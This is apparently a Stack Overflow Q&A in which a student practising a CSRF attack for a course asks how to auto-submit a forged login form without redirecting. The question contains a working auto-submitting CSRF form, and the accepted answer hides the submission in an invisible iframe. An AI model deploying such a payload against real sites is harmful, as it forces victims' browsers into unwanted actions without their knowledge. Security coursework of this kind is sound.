# submitting a form through javascript without redirecting

Tags: javascript, html

I'm practicing a CSRF attack for my course and I have to attack a dummy website by creating a "fake" page. I have the following code

**csrf.html**

```
<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
    <form name ='csrf_form' action='http://course_website/login' method="POST">
        <input type='hidden' name='username' value='attacker_id'>
        <input type='hidden' name='password' value='attacker_pw'>
    </form>
    <script>
        document.csrf_form.submit();
    </script>
</body>
```

The code above works perfectly, except that every time I open **csrf.html** it will also open up the `course_website` page. I just want it to remain on **csrf.html** and not redirect/ open up a new tab.

After looking through SO (I don't know much js..), I tried

```
<script>
        document.csrf_form.submit(function(){
           return false;
        });
</script>
```

and  adding a `onsubmit = return false;` to the form itself, but neither works.

What is the best thing to do here?

PS: not sure if this changes anything, but I used `action` as oppose to `target` in my form because one works and the other does not. Anything that I have to watch out for?

Answer (score 3, accepted):

E.g. of the above answer in your code

```
<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
    <form name ='csrf_form' target='hiddenFrame' action='http://course_website/login' method="POST">
        <input type='hidden' name='username' value='attacker_id'>
        <input type='hidden' name='password' value='attacker_pw'>
    </form>
    <iframe name='hiddenFrame'  style='display:none'></iframe>
    <script>
        document.csrf_form.submit();
    </script>
</body>
```

Answer (score 4):

> but I used action as oppose to target in my form because one works and the other does not

`target` and `action` do completely different things.

- `action` specifies the URL to send the request to.
- `target` specifies the frame to open the response to that request in

If you don't want to leave the current page, then you need to specify the `target` as a frame or new window. Omitting it was cause the new page to load in the current window and replace the document containing the form.

---

If it also possible to (kinda) submit forms without leaving the page by cancelling the form submission and then simulating it with JavaScript (generally via the `XMLHttpRequest` object) instead. A CSRF attack is going to be cross-origin though, so that approach will likely fail due to the Same Origin Policy).